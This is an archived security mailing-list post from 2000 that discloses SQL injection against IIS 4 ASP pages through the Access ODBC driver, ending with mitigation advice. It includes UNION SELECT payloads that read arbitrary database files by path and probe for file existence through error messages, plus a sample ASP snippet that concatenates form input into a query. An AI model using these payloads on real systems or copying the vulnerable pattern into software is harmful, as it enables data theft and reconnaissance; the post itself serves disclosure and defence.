More SQL hacking with IIS 4 through Access Driver

From: Jesús López de Aguileta (aguiletaat_private)
Date: Mon Feb 07 2000 - 01:45:30 PST

Next message: James Seymour: "Re: Sprint PCS vulnerable to malicious tags"

Previous message: Marc Slemko: "Re: recent 'cross site scripting' CERT advisory"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

System:

WinNT Spanish SP5
Data Access 2.1
Option Pack 4

The following SQL works in a ADODB connection inside ASP

select field1,field2 from table_DSN_DB where field1=21 union select
address,path from
\winnt\profiles\administrador\escritorio\report.mdb.scanner

The first sentence (on the left-side from 'union') is the valid query. A DSN
exists and is pointing the DB containing the table "table_DSN_DB". But the
second appended query did not have any DSN pointing to it. For this example
I have used a Retina scanner report located at the Administrator desktop.

Obviously IUSR_Server must have ACL authorization to the file "report.mdb"
for this to work.

Now thing in a typical code like this:
---------------------
set conect_to = Server.CreateObject("ADODB.Connection")
conect_to.open "validDSN"

SQLQuery = "select family,description from table where family=" &
request.form("family_of_item")

set lot_of_registers=conect_to.execute (SQLQuery)

do while not lot_of_registers.EOF

    response.write( lot_of_registers.fields("family"))
    response.write( lot_of_registers.fields("description"))

    lot_of_registers.movenext

loop
--------------------------

It would be easy to tweak this query to access any database on the NT. The
standard error report from the IIS allows you to tune your query.

But there is more: you can check for installation of vulnerable
programs/scripts.

If exists:
-------------------------------------------------------------------------
> select family,description from table where family=21 union select * from
\autoexec.bat.mdb

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\AUTOEXEC.BAT'.

------------------------------------------

If not exists:

---------------------------------------
> select family,description from table where family=21 union select * from
\other_autoexec.bat.mdb

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\other_autoexec.bat'.
--------------------------------------------------

Solution:

- Check the ACL from all your access databases in the NT box.
- Check ALL the input from any form that could be used to construct a SQL
query.

Regards,

Jesús López de Aguileta
EunateNet

Next message: James Seymour: "Re: Sprint PCS vulnerable to malicious tags"
Previous message: Marc Slemko: "Re: recent 'cross site scripting' CERT advisory"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:33:43 PDT